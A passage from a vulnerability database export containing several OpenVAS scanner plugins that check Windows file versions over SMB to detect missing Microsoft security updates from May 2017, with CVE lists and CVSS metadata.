See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811209\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98259, 98261, 98263, 98264, 98265, 98260, 98274, 98266,\n 98267, 98268, 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-19 11:10:25 +0530 (Mon, 19 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019623)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019623\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the error in\n the way Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause the affected system to stop responding until it is manually\n restarted. 
Also successful exploitation will allow attacker to get sensitive\n data and execute arbitrary code in context of current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8 x86/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019623\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025687\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8:1, win8x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.2.9200.22137\"))\n{\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + 'Less than 6.2.9200.22137' + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:44", "description": "This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019214", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019214)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2017-0226", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811112", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811112", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019214)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811112\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0220\", \"CVE-2017-0222\",\n \"CVE-2017-0226\", \"CVE-2017-0238\", \"CVE-2017-0245\", \"CVE-2017-0246\",\n \"CVE-2017-0258\", \"CVE-2017-0263\", \"CVE-2017-0267\", \"CVE-2017-0268\",\n \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\", \"CVE-2017-0272\",\n \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\", \"CVE-2017-0276\",\n \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98114, 98115, 98112, 98111, 98097, 98274, 98273, 98298, 98271,\n 98270, 98272, 98259, 98258, 98237, 98108, 98121, 98127, 98103,\n 98102, 98260, 98261, 98263, 98264, 98265, 98266, 98267, 98268,\n 98139);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 11:57:51 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019214)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019214\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This 
security update includes quality\n and security improvements in Microsoft Graphics Component, Windows COM,\n Windows Server, Windows Kernel and Microsoft Windows DNS\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n and access information from one domain and inject it into another domain, bypass\n security restrictions, conduct denial-of-service condition and gain access to\n potentially sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019214\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.2.9200.22141\"))\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22141\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:29:30", "description": "This host is missing a critical 
security\n update (monthly rollup) according to microsoft KB4019215.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019215)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811113", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811113", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019215)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811113\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0228\", \"CVE-2017-0231\", \"CVE-2017-0238\", \"CVE-2017-0246\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98097, 98298, 98102, 98103, 98127, 98139, 98164,\n 98173, 98237, 98108, 98112, 98113, 98258, 98259, 98261, 98263,\n 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271,\n 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:07:03 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019215)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019215.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue where applications that use msado15.dll stop working after\n installing security update 4015550.\n\n - Deprecated SHA-1 Microsoft Edge and Internet Explorer 11 for SSL/TLS Server\n Authentication.\n\n - Updated Internet Explorer 11's New Tab Page with an integrated newsfeed.\n\n - Includes security updates to Microsoft Graphics Component, Microsoft Windows\n DNS, Windows COM, Windows Server, Windows kernel, and Internet Explorer.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n bypass security restrictions, conduct denial-of-service condition, gain access\n to potentially sensitive information and spoof content by tricking a user by\n redirecting the user to a specially crafted website.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64 systems\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019215\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.3.9600.18666\"))\n{\n report = 'File checked: ' + sysPath + \"\\System32\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18666\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:25:18", "description": "This host is missing important/critical\n security update according to Microsoft Security update KB4019474.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019474)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", 
"CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811111", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811111", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019474)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811111\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0190\", \"CVE-2017-0212\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0231\",\n \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\",\n \"CVE-2017-0240\", \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98298, 98099, 98102, 98103, 98127, 98139, 98281,\n 98164, 98217, 98173, 98179, 98229, 98234, 98237, 98203, 98208,\n 98108, 98117, 98112, 98113, 98258, 98259, 98261, 98263, 98264,\n 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271, 98272,\n 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:55:53 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019474)\");\n\n script_tag(name:\"summary\", value:\"This host is missing important/critical\n security update according to 
Microsoft Security update KB4019474.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019474\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_is_less(version:edgeVer, test_version:\"11.0.10240.17394\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: Less than 11.0.10240.17394\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-06-08T23:25:38", "description": "This host is missing a critical/important\n security update according to Microsoft KB4019473.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019473)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811110", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019473)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811110\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0190\", \"CVE-2017-0212\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0231\",\n \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\",\n \"CVE-2017-0240\", \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0266\",\n \"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98298, 98099, 98102, 98103, 98127, 98139, 98281,\n 98164, 98217, 98173, 98179, 98229, 98234, 98237, 98203, 98208,\n 98108, 98117, 98112, 98113, 98258, 98276, 98259, 98261, 98263,\n 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271,\n 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:55:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019473)\");\n\n 
script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019473.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019473\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.915\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.915\\n' ;\n security_message(data:report);\n 
exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:47:45", "description": "This host is missing an important security\n update according to Microsoft security update KB4019204.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows 'Win32k.sys' Multiple Vulnerabilities (KB4019204)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0263", "CVE-2017-0245", "CVE-2017-8552", "CVE-2017-0246"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811028", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 'Win32k.sys' Multiple Vulnerabilities (KB4019204)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811028\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-0245\", \"CVE-2017-0246\", \"CVE-2017-0263\", \"CVE-2017-8552\");\n script_bugtraq_id(98115, 98108);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 10:30:09 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows 'Win32k.sys' Multiple Vulnerabilities (KB4019204)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft security update KB4019204.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error when the win32k component improperly provides kernel information.\n\n - An error when Windows improperly handles objects in memory.\n\n - An error in Windows when the Windows kernel-mode driver fails to properly\n handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode allowing attacker to install programs,\n view, change, or delete data, or create new accounts with full user 